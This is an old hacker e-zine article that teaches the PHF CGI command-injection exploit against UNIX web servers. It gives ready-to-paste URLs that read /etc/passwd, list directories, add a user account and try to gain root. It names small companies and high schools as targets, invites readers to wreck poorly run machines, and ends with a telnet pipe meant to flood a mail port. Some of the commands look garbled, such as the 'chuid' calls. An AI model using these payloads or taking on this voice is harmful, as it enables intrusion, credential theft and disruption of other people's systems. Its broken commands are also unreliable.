¦ R E A L I T Y C H E C K N E T W O R K! ¦_ +----------------------------------------------------------------------------¦_ ¦ ¦ ¦ From Issue #33 - PHF Web Hacking ¦ ¦ by Dagashi ¦ ¦____________________________________________________________________________¦_ ¦____________________________________________________________________________¦_ +----------------------------------------------------------------------------¦_ ¦ ¦_ ¦ Alright there kiddies, it's time to lightly dive into the world of ¦_ ¦ how to obtain shells that do not rightfully belong to you and how to ¦_ ¦ generally piss off people on the Internet. As always, this is a well ¦_ ¦ known bit on information (because no one in their right mind would give ¦_ ¦ you an exploit to a system that no one else knows of), so I take no ¦_ ¦ responsibility for whatever you do with it. ¦_ ¦ ¦_ ¦ Since the majority of computers on the Internet are of UNIX decent, ¦_ ¦ I will be mainly talk about their problems and such. Now, the majority ¦_ ¦ of us know that UNIX is full of holes and other problems no matter what ¦_ ¦ revisions and patches are made, so this might not come as a big surprise ¦ ¦ when I tell you there is a common exploit that will run any program on ¦ ¦ your victim machine. It is the PHF hack. Though it is no big deal to ¦ ¦ the majority of ISP's, most little companies do not have the time or ¦ ¦ money to deal with all the problems of their operating systems. Small ¦ ¦ schools that are NOT technologically oriented, like high schools with ¦ ¦ T1's and such would be a good example. And so, this will work on some ¦ ¦ of them. ¦ ¦ ¦ ¦ All that is required to be done is to put this into the URL of ¦ ¦ Netscape: ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ¦ ¦ ¦ ¦ and you have a listing of the passwd file to use or abuse. But the ¦ ¦ PHF exploit can do more then just that (for those of you who will be ¦ ¦ flaming me for writing such a simple article). It can access any type ¦ ¦ of program that is on the opposing computer and run it. ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ ¦ ¦ ¦ ¦ will give you the directory listing of everything from the root of ¦ ¦ the system. From there, you can just alter it accordingly to have a ¦ ¦ peek around the system to see what else you can learn. ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin ¦ ¦ ¦ ¦ would show you every command that is available in the bin dir. If ¦ ¦ you slightly modified it, you would also be able to see the permissions ¦ ¦ of the specific files. ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin ¦ ¦ ¦ ¦ which can come in handy since, well, seeing as how you have root ¦ ¦ permissions you now have a nice little bit of information about how the ¦ ¦ system functions can use that to get even more access or information out ¦ ¦ of it. ¦ ¦ ¦ ¦ Or the best one of them all: ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi ¦ ¦ %20dagashi%20100%20 ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0 ¦ ¦ ¦ ¦ http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 ¦ ¦ ¦ ¦ Do that and you MIGHT have root access to the server by telnet. Be ¦ ¦ forewarned that this is an old hack and many servers would not have the ¦ ¦ PHF script still running or have chmoded it to 000. This can get you ¦ ¦ into a bunch of trouble, so be careful. As I said before, this is well ¦ ¦ known and I wouldn't give it out to you unless most system ¦ ¦ administrators (if they deserve the title then they know this hack by ¦ ¦ heart) knew it as well. But there are always those that don't deserve ¦ ¦ the honor of the name, and to those, you have my full consent to fuck up ¦ ¦ their machines to hell. ¦ ¦ ¦ ¦ For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1 ¦ ¦ 25" in Linux and watch life become a ball. ¦ ¦ ¦ +----------------------------------------------------------------------------+